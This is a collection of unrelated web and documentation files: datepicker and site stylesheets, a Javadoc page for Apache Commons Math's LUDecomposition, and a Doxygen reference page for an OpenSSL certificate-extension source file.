padding: 4px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
direction: ltr;
/*.dow {
border-top: 1px solid #ddd !important;
}*/
}
.datepicker-inline {
width: 220px;
}
.datepicker.datepicker-rtl {
direction: rtl;
}
.datepicker.datepicker-rtl table tr td span {
float: right;
}
.datepicker-dropdown {
top: 0;
left: 0;
}
.datepicker-dropdown:before {
content: '';
display: inline-block;
border-left: 7px solid transparent;
border-right: 7px solid transparent;
border-bottom: 7px solid #ccc;
border-top: 0;
border-bottom-color: rgba(0, 0, 0, 0.2);
position: absolute;
}
.datepicker-dropdown:after {
content: '';
display: inline-block;
border-left: 6px solid transparent;
border-right: 6px solid transparent;
border-bottom: 6px solid #ffffff;
border-top: 0;
position: absolute;
}
.datepicker-dropdown.datepicker-orient-left:before {
left: 6px;
}
.datepicker-dropdown.datepicker-orient-left:after {
left: 7px;
}
.datepicker-dropdown.datepicker-orient-right:before {
right: 6px;
}
.datepicker-dropdown.datepicker-orient-right:after {
right: 7px;
}
.datepicker-dropdown.datepicker-orient-top:before {
top: -7px;
}
.datepicker-dropdown.datepicker-orient-top:after {
top: -6px;
}
.datepicker-dropdown.datepicker-orient-bottom:before {
bottom: -7px;
border-bottom: 0;
border-top: 7px solid #999;
}
.datepicker-dropdown.datepicker-orient-bottom:after {
bottom: -6px;
border-bottom: 0;
border-top: 6px solid #ffffff;
}
.datepicker > div {
display: none;
}
.datepicker.days div.datepicker-days {
display: block;
}
.datepicker.months div.datepicker-months {
display: block;
}
.datepicker.years div.datepicker-years {
display: block;
}
.datepicker table {
margin: 0;
-webkit-touch-callout: none;
-webkit-user-select: none;
-khtml-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
.datepicker td,
.datepicker th {
text-align: center;
width: 20px;
height: 20px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
border: none;
}
.table-striped .datepicker table tr td,
.table-striped .datepicker table tr th {
background-color: transparent;
}
.datepicker table tr td.day:hover {
background: #eeeeee;
cursor: pointer;
}
.datepicker table tr td.old,
.datepicker table tr td.new {
color: #999999;
}
.datepicker table tr td.disabled,
.datepicker table tr td.disabled:hover {
background: none;
color: #999999;
cursor: default;
}
.datepicker table tr td.today,
.datepicker table tr td.today:hover,
.datepicker table tr td.today.disabled,
.datepicker table tr td.today.disabled:hover {
background-color: #fde19a;
background-image: -moz-linear-gradient(top, #fdd49a, #fdf59a);
background-image: -ms-linear-gradient(top, #fdd49a, #fdf59a);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#fdd49a), to(#fdf59a));
background-image: -webkit-linear-gradient(top, #fdd49a, #fdf59a);
background-image: -o-linear-gradient(top, #fdd49a, #fdf59a);
background-image: linear-gradient(top, #fdd49a, #fdf59a);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fdd49a', endColorstr='#fdf59a', GradientType=0);
border-color: #fdf59a #fdf59a #fbed50;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
color: #000;
}
.datepicker table tr td.today:hover,
.datepicker table tr td.today:hover:hover,
.datepicker table tr td.today.disabled:hover,
.datepicker table tr td.today.disabled:hover:hover,
.datepicker table tr td.today:active,
.datepicker table tr td.today:hover:active,
.datepicker table tr td.today.disabled:active,
.datepicker table tr td.today.disabled:hover:active,
.datepicker table tr td.today.active,
.datepicker table tr td.today:hover.active,
.datepicker table tr td.today.disabled.active,
.datepicker table tr td.today.disabled:hover.active,
.datepicker table tr td.today.disabled,
.datepicker table tr td.today:hover.disabled,
.datepicker table tr td.today.disabled.disabled,
.datepicker table tr td.today.disabled:hover.disabled,
.datepicker table tr td.today[disabled],
.datepicker table tr td.today:hover[disabled],
.datepicker table tr td.today.disabled[disabled],
.datepicker table tr td.today.disabled:hover[disabled] {
background-color: #fdf59a;
}
.datepicker table tr td.today:active,
.datepicker table tr td.today:hover:active,
.datepicker table tr td.today.disabled:active,
.datepicker table tr td.today.disabled:hover:active,
.datepicker table tr td.today.active,
.datepicker table tr td.today:hover.active,
.datepicker table tr td.today.disabled.active,
.datepicker table tr td.today.disabled:hover.active {
background-color: #fbf069 \9;
}
.datepicker table tr td.today:hover:hover {
color: #000;
}
.datepicker table tr td.today.active:hover {
color: #fff;
}
.datepicker table tr td.range,
.datepicker table tr td.range:hover,
.datepicker table tr td.range.disabled,
.datepicker table tr td.range.disabled:hover {
background: #eeeeee;
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
}
.datepicker table tr td.range.today,
.datepicker table tr td.range.today:hover,
.datepicker table tr td.range.today.disabled,
.datepicker table tr td.range.today.disabled:hover {
background-color: #f3d17a;
background-image: -moz-linear-gradient(top, #f3c17a, #f3e97a);
background-image: -ms-linear-gradient(top, #f3c17a, #f3e97a);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f3c17a), to(#f3e97a));
background-image: -webkit-linear-gradient(top, #f3c17a, #f3e97a);
background-image: -o-linear-gradient(top, #f3c17a, #f3e97a);
background-image: linear-gradient(top, #f3c17a, #f3e97a);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3c17a', endColorstr='#f3e97a', GradientType=0);
border-color: #f3e97a #f3e97a #edde34;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
}
.datepicker table tr td.range.today:hover,
.datepicker table tr td.range.today:hover:hover,
.datepicker table tr td.range.today.disabled:hover,
.datepicker table tr td.range.today.disabled:hover:hover,
.datepicker table tr td.range.today:active,
.datepicker table tr td.range.today:hover:active,
.datepicker table tr td.range.today.disabled:active,
.datepicker table tr td.range.today.disabled:hover:active,
.datepicker table tr td.range.today.active,
.datepicker table tr td.range.today:hover.active,
.datepicker table tr td.range.today.disabled.active,
.datepicker table tr td.range.today.disabled:hover.active,
.datepicker table tr td.range.today.disabled,
.datepicker table tr td.range.today:hover.disabled,
.datepicker table tr td.range.today.disabled.disabled,
.datepicker table tr td.range.today.disabled:hover.disabled,
.datepicker table tr td.range.today[disabled],
.datepicker table tr td.range.today:hover[disabled],
.datepicker table tr td.range.today.disabled[disabled],
.datepicker table tr td.range.today.disabled:hover[disabled] {
background-color: #f3e97a;
}
.datepicker table tr td.range.today:active,
.datepicker table tr td.range.today:hover:active,
.datepicker table tr td.range.today.disabled:active,
.datepicker table tr td.range.today.disabled:hover:active,
.datepicker table tr td.range.today.active,
.datepicker table tr td.range.today:hover.active,
.datepicker table tr td.range.today.disabled.active,
.datepicker table tr td.range.today.disabled:hover.active {
background-color: #efe24b \9;
}
.datepicker table tr td.selected,
.datepicker table tr td.selected:hover,
.datepicker table tr td.selected.disabled,
.datepicker table tr td.selected.disabled:hover {
background-color: #9e9e9e;
background-image: -moz-linear-gradient(top, #b3b3b3, #808080);
background-image: -ms-linear-gradient(top, #b3b3b3, #808080);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#b3b3b3), to(#808080));
background-image: -webkit-linear-gradient(top, #b3b3b3, #808080);
background-image: -o-linear-gradient(top, #b3b3b3, #808080);
background-image: linear-gradient(top, #b3b3b3, #808080);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#b3b3b3', endColorstr='#808080', GradientType=0);
border-color: #808080 #808080 #595959;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
color: #fff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
}
.datepicker table tr td.selected:hover,
.datepicker table tr td.selected:hover:hover,
.datepicker table tr td.selected.disabled:hover,
.datepicker table tr td.selected.disabled:hover:hover,
.datepicker table tr td.selected:active,
.datepicker table tr td.selected:hover:active,
.datepicker table tr td.selected.disabled:active,
.datepicker table tr td.selected.disabled:hover:active,
.datepicker table tr td.selected.active,
.datepicker table tr td.selected:hover.active,
.datepicker table tr td.selected.disabled.active,
.datepicker table tr td.selected.disabled:hover.active,
.datepicker table tr td.selected.disabled,
.datepicker table tr td.selected:hover.disabled,
.datepicker table tr td.selected.disabled.disabled,
.datepicker table tr td.selected.disabled:hover.disabled,
.datepicker table tr td.selected[disabled],
.datepicker table tr td.selected:hover[disabled],
.datepicker table tr td.selected.disabled[disabled],
.datepicker table tr td.selected.disabled:hover[disabled] {
background-color: #808080;
}
.datepicker table tr td.selected:active,
.datepicker table tr td.selected:hover:active,
.datepicker table tr td.selected.disabled:active,
.datepicker table tr td.selected.disabled:hover:active,
.datepicker table tr td.selected.active,
.datepicker table tr td.selected:hover.active,
.datepicker table tr td.selected.disabled.active,
.datepicker table tr td.selected.disabled:hover.active {
background-color: #666666 \9;
}
.datepicker table tr td.active,
.datepicker table tr td.active:hover,
.datepicker table tr td.active.disabled,
.datepicker table tr td.active.disabled:hover {
background-color: #006dcc;
background-image: -moz-linear-gradient(top, #0088cc, #0044cc);
background-image: -ms-linear-gradient(top, #0088cc, #0044cc);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0044cc));
background-image: -webkit-linear-gradient(top, #0088cc, #0044cc);
background-image: -o-linear-gradient(top, #0088cc, #0044cc);
background-image: linear-gradient(top, #0088cc, #0044cc);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#0088cc', endColorstr='#0044cc', GradientType=0);
border-color: #0044cc #0044cc #002a80;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
color: #fff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
}
.datepicker table tr td.active:hover,
.datepicker table tr td.active:hover:hover,
.datepicker table tr td.active.disabled:hover,
.datepicker table tr td.active.disabled:hover:hover,
.datepicker table tr td.active:active,
.datepicker table tr td.active:hover:active,
.datepicker table tr td.active.disabled:active,
.datepicker table tr td.active.disabled:hover:active,
.datepicker table tr td.active.active,
.datepicker table tr td.active:hover.active,
.datepicker table tr td.active.disabled.active,
.datepicker table tr td.active.disabled:hover.active,
.datepicker table tr td.active.disabled,
.datepicker table tr td.active:hover.disabled,
.datepicker table tr td.active.disabled.disabled,
.datepicker table tr td.active.disabled:hover.disabled,
.datepicker table tr td.active[disabled],
.datepicker table tr td.active:hover[disabled],
.datepicker table tr td.active.disabled[disabled],
.datepicker table tr td.active.disabled:hover[disabled] {
background-color: #0044cc;
}
.datepicker table tr td.active:active,
.datepicker table tr td.active:hover:active,
.datepicker table tr td.active.disabled:active,
.datepicker table tr td.active.disabled:hover:active,
.datepicker table tr td.active.active,
.datepicker table tr td.active:hover.active,
.datepicker table tr td.active.disabled.active,
.datepicker table tr td.active.disabled:hover.active {
background-color: #003399 \9;
}
.datepicker table tr td span {
display: block;
width: 23%;
height: 54px;
line-height: 54px;
float: left;
margin: 1%;
cursor: pointer;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.datepicker table tr td span:hover {
background: #eeeeee;
}
.datepicker table tr td span.disabled,
.datepicker table tr td span.disabled:hover {
background: none;
color: #999999;
cursor: default;
}
.datepicker table tr td span.active,
.datepicker table tr td span.active:hover,
.datepicker table tr td span.active.disabled,
.datepicker table tr td span.active.disabled:hover {
background-color: #006dcc;
background-image: -moz-linear-gradient(top, #0088cc, #0044cc);
background-image: -ms-linear-gradient(top, #0088cc, #0044cc);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0044cc));
background-image: -webkit-linear-gradient(top, #0088cc, #0044cc);
background-image: -o-linear-gradient(top, #0088cc, #0044cc);
background-image: linear-gradient(top, #0088cc, #0044cc);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#0088cc', endColorstr='#0044cc', GradientType=0);
border-color: #0044cc #0044cc #002a80;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
color: #fff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
}
.datepicker table tr td span.active:hover,
.datepicker table tr td span.active:hover:hover,
.datepicker table tr td span.active.disabled:hover,
.datepicker table tr td span.active.disabled:hover:hover,
.datepicker table tr td span.active:active,
.datepicker table tr td span.active:hover:active,
.datepicker table tr td span.active.disabled:active,
.datepicker table tr td span.active.disabled:hover:active,
.datepicker table tr td span.active.active,
.datepicker table tr td span.active:hover.active,
.datepicker table tr td span.active.disabled.active,
.datepicker table tr td span.active.disabled:hover.active,
.datepicker table tr td span.active.disabled,
.datepicker table tr td span.active:hover.disabled,
.datepicker table tr td span.active.disabled.disabled,
.datepicker table tr td span.active.disabled:hover.disabled,
.datepicker table tr td span.active[disabled],
.datepicker table tr td span.active:hover[disabled],
.datepicker table tr td span.active.disabled[disabled],
.datepicker table tr td span.active.disabled:hover[disabled] {
background-color: #0044cc;
}
.datepicker table tr td span.active:active,
.datepicker table tr td span.active:hover:active,
.datepicker table tr td span.active.disabled:active,
.datepicker table tr td span.active.disabled:hover:active,
.datepicker table tr td span.active.active,
.datepicker table tr td span.active:hover.active,
.datepicker table tr td span.active.disabled.active,
.datepicker table tr td span.active.disabled:hover.active {
background-color: #003399 \9;
}
.datepicker table tr td span.old,
.datepicker table tr td span.new {
color: #999999;
}
.datepicker th.datepicker-switch {
width: 145px;
}
.datepicker thead tr:first-child th,
.datepicker tfoot tr th {
cursor: pointer;
}
.datepicker thead tr:first-child th:hover,
.datepicker tfoot tr th:hover {
background: #eeeeee;
}
.datepicker .cw {
font-size: 10px;
width: 12px;
padding: 0 2px 0 5px;
vertical-align: middle;
}
.datepicker thead tr:first-child th.cw {
cursor: default;
background-color: transparent;
}
.input-append.date .add-on i,
.input-prepend.date .add-on i {
display: block;
cursor: pointer;
width: 16px;
height: 16px;
}
.input-daterange input {
text-align: center;
}
.input-daterange input:first-child {
-webkit-border-radius: 3px 0 0 3px;
-moz-border-radius: 3px 0 0 3px;
border-radius: 3px 0 0 3px;
}
.input-daterange input:last-child {
-webkit-border-radius: 0 3px 3px 0;
-moz-border-radius: 0 3px 3px 0;
border-radius: 0 3px 3px 0;
}
.input-daterange .add-on {
display: inline-block;
width: auto;
min-width: 16px;
height: 18px;
padding: 4px 5px;
font-weight: normal;
line-height: 18px;
text-align: center;
text-shadow: 0 1px 0 #ffffff;
vertical-align: middle;
background-color: #eeeeee;
border: 1px solid #ccc;
margin-left: -5px;
margin-right: -5px;
}
|
libraries/commons-math3-3.4.1/docs/apidocs/org/apache/commons/math3/linear/class-use/LUDecomposition.html | as-1/STSP | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>Uses of Class org.apache.commons.math3.linear.LUDecomposition (Apache Commons Math 3.4.1 API)</title>
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.commons.math3.linear.LUDecomposition (Apache Commons Math 3.4.1 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/commons/math3/linear/LUDecomposition.html" title="class in org.apache.commons.math3.linear">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>PREV</li>
<li>NEXT</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/commons/math3/linear//class-useLUDecomposition.html" target="_top">FRAMES</a></li>
<li><a href="LUDecomposition.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.commons.math3.linear.LUDecomposition" class="title">Uses of Class<br>org.apache.commons.math3.linear.LUDecomposition</h2>
</div>
<div class="classUseContainer">No usage of org.apache.commons.math3.linear.LUDecomposition</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/commons/math3/linear/LUDecomposition.html" title="class in org.apache.commons.math3.linear">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>PREV</li>
<li>NEXT</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/commons/math3/linear//class-useLUDecomposition.html" target="_top">FRAMES</a></li>
<li><a href="LUDecomposition.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>Copyright © 2003–2015 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All rights reserved.</small></p>
</body>
</html>
|
templates/yoo_micasa/css/font2/droidserif.css | tedlodydesign2014/micasa | /* Copyright (C) YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */
h1,
h2,
h3,
h4,
h5,
h6 { font-family: "DroidSerifRegular"; }
.frontpage-teaser-1 h1,
.frontpage-teaser-2 h1,
.frontpage-teaser-3 h1 { font-style: italic; } |
components/crypto-api/core/docs/html/v3__pku_8c.html | odit/rv042 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>v3_pku.c File Reference</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.2.18 -->
<center>
<a class="qindex" href="index.html">Main Page</a> <a class="qindex" href="annotated.html">Data Structures</a> <a class="qindex" href="files.html">File List</a> <a class="qindex" href="functions.html">Data Fields</a> <a class="qindex" href="globals.html">Globals</a> <a class="qindex" href="pages.html">Related Pages</a> </center>
<hr><h1>v3_pku.c File Reference</h1><code>#include <stdio.h></code><br>
<code>#include "<a class="el" href="cryptlib_8h-source.html">cryptlib.h</a>"</code><br>
<code>#include <<a class="el" href="asn1_8h-source.html">openssl/asn1.h</a>></code><br>
<code>#include <<a class="el" href="asn1t_8h-source.html">openssl/asn1t.h</a>></code><br>
<code>#include <<a class="el" href="include_2openssl_2x509v3_8h-source.html">openssl/x509v3.h</a>></code><br>
<table border=0 cellpadding=0 cellspacing=0>
<tr><td></td></tr>
<tr><td colspan=2><br><h2>Functions</h2></td></tr>
<tr><td nowrap align=right valign=top>int </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a3">i2r_PKEY_USAGE_PERIOD</a> (<a class="el" href="include_2openssl_2x509v3_8h.html#a180">X509V3_EXT_METHOD</a> *<a class="el" href="rsa__asn1_8c.html#a0">method</a>, <a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> *<a class="el" href="v3__pku_8c.html#a1">usage</a>, <a class="el" href="bio_8h.html#a285">BIO</a> *<a class="el" href="v3__pku_8c.html#a2">out</a>, int indent)</td></tr>
<tr><td nowrap align=right valign=top> </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a4">ASN1_SEQUENCE</a> (<a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a>)=</td></tr>
<tr><td nowrap align=right valign=top> </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a5">ASN1_SEQUENCE_END</a> (<a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a>) static int i2r_PKEY_USAGE_PERIOD(<a class="el" href="include_2openssl_2x509v3_8h.html#a180">X509V3_EXT_METHOD</a> *<a class="el" href="rsa__asn1_8c.html#a0">method</a></td></tr>
<tr><td colspan=2><br><h2>Variables</h2></td></tr>
<tr><td nowrap align=right valign=top><a class="el" href="include_2openssl_2x509v3_8h.html#a180">X509V3_EXT_METHOD</a> </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a0">v3_pkey_usage_period</a></td></tr>
<tr><td nowrap align=right valign=top><a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> * </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a1">usage</a></td></tr>
<tr><td nowrap align=right valign=top><a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> <a class="el" href="bio_8h.html#a285">BIO</a> * </td><td valign=bottom><a class="el" href="v3__pku_8c.html#a2">out</a></td></tr>
</table>
<hr><h2>Function Documentation</h2>
<a name="a4" doxytag="v3_pku.c::ASN1_SEQUENCE"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> ASN1_SEQUENCE </td>
<td class="md" valign="top">( </td>
<td class="md" nowrap valign="top"><a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> </td>
<td class="mdname1" valign="top" nowrap> </td>
<td class="md" valign="top">) </td>
<td class="md" nowrap></td>
</tr>
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
</td>
</tr>
</table>
<a name="a5" doxytag="v3_pku.c::ASN1_SEQUENCE_END"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> ASN1_SEQUENCE_END </td>
<td class="md" valign="top">( </td>
<td class="md" nowrap valign="top"><a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> </td>
<td class="mdname1" valign="top" nowrap> </td>
<td class="md" valign="top">) </td>
<td class="md" nowrap></td>
</tr>
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
</td>
</tr>
</table>
<a name="a3" doxytag="v3_pku.c::i2r_PKEY_USAGE_PERIOD"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> int i2r_PKEY_USAGE_PERIOD </td>
<td class="md" valign="top">( </td>
<td class="md" nowrap valign="top"><a class="el" href="include_2openssl_2x509v3_8h.html#a180">X509V3_EXT_METHOD</a> * </td>
<td class="mdname" nowrap> <em>method</em>, </td>
</tr>
<tr>
<td></td>
<td></td>
<td class="md" nowrap><a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> * </td>
<td class="mdname" nowrap> <em>usage</em>, </td>
</tr>
<tr>
<td></td>
<td></td>
<td class="md" nowrap><a class="el" href="bio_8h.html#a285">BIO</a> * </td>
<td class="mdname" nowrap> <em>out</em>, </td>
</tr>
<tr>
<td></td>
<td></td>
<td class="md" nowrap>int </td>
<td class="mdname" nowrap> <em>indent</em></td>
</tr>
<tr>
<td></td>
<td class="md">) </td>
<td class="md" colspan="2"><code> [static]</code></td>
</tr>
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
</td>
</tr>
</table>
<hr><h2>Variable Documentation</h2>
<a name="a2" doxytag="v3_pku.c::out"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> <a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a> <a class="el" href="bio_8h.html#a285">BIO</a>* out
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
</td>
</tr>
</table>
<a name="a1" doxytag="v3_pku.c::usage"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> <a class="el" href="include_2openssl_2x509v3_8h.html#a184">PKEY_USAGE_PERIOD</a>* usage
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
</td>
</tr>
</table>
<a name="a0" doxytag="v3_pku.c::v3_pkey_usage_period"></a><p>
<table width="100%" cellpadding="2" cellspacing="0" border="0">
<tr>
<td class="md">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="md" nowrap valign="top"> <a class="el" href="include_2openssl_2x509v3_8h.html#a180">X509V3_EXT_METHOD</a> v3_pkey_usage_period
</table>
</td>
</tr>
</table>
<table cellspacing=5 cellpadding=0 border=0>
<tr>
<td>
</td>
<td>
<p>
<b>Initial value:</b><div class="fragment"><pre> {
<a class="code" href="obj__mac_8h.html#a1290">NID_private_key_usage_period</a>, 0, <a class="code" href="asn1_8h.html#a92">ASN1_ITEM_ref</a>(<a class="code" href="structPKEY__USAGE__PERIOD__st.html">PKEY_USAGE_PERIOD</a>),
0,0,0,0,
0,0,0,0,
(X509V3_EXT_I2R)i2r_PKEY_USAGE_PERIOD, NULL,
NULL
}</pre></div> </td>
</tr>
</table>
<hr><address style="align: right;"><small>Generated on Mon Aug 14 19:59:45 2006 for Octeon Core Crypto API by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border=0
width=110 height=53></a>1.2.18 </small></address>
</body>
</html>
|
YABT_Web/WebContent/resources/css/yabt.css | mike-plummer/YetAnotherBugTracker | body {
background-image:url('../img/desktop.jpg');
}
header {
height: 50px;
}
header {
/* Fallback Color */
background: #F4F8F9;
/* Firefox 3.6+ */
background-image: -moz-linear-gradient(#7CBC25, #608E1D);
/* Safari 4+, Chrome 1+ */
background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#7CBC25), to(#608E1D));
/* Safari 5.1+, Chrome 10+ */
background-image: -webkit-linear-gradient(#7CBC25, #608E1D);
/* IE */
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#7CBC25', endColorstr='#608E1D');
}
/* Logo */
span.appName {
color: #FFFFFF;
vertical-align: bottom;
text-shadow: 1px 1px 3px #000000;
font-size: 200%;
margin: 15px 0 10px 5px;
font-family: Helvetica,sans-serif;
position: absolute;
}
span.logo a {
display: block;
width: 221px;
height: 30px;
background: url('../img/logo.png') no-repeat;
float: left;
margin: 15px 0 0 5px;
text-indent: -5000px;
}
span.userWelcome {
float: right;
vertical-align: top;
margin: 5px 5px 0 0;
color: #FFFFFF;
font-family: Helvetica,sans-serif;
}
span.logout {
float: right;
vertical-align: top;
margin: 30px -80px 0 0;
color: #FFFFFF;
font-weight: bold;
font-family: Helvetica,sans-serif;
}
.wrapper {
width: 100%;
margin: 0 auto;
}
.message {
color: #ff0000;
background-color: #ffEEEE;
border: 3px solid #ff0000;
padding: 8px;
margin: 16px;
}
|
wp-content/plugins/advanced-iframe/includes/css/wordpress-standalone.css | arkev/UM-Virtual |
.wp-admin #wpadminbar #wp-admin-bar-site-name > .ab-item::before { content: '?'; }
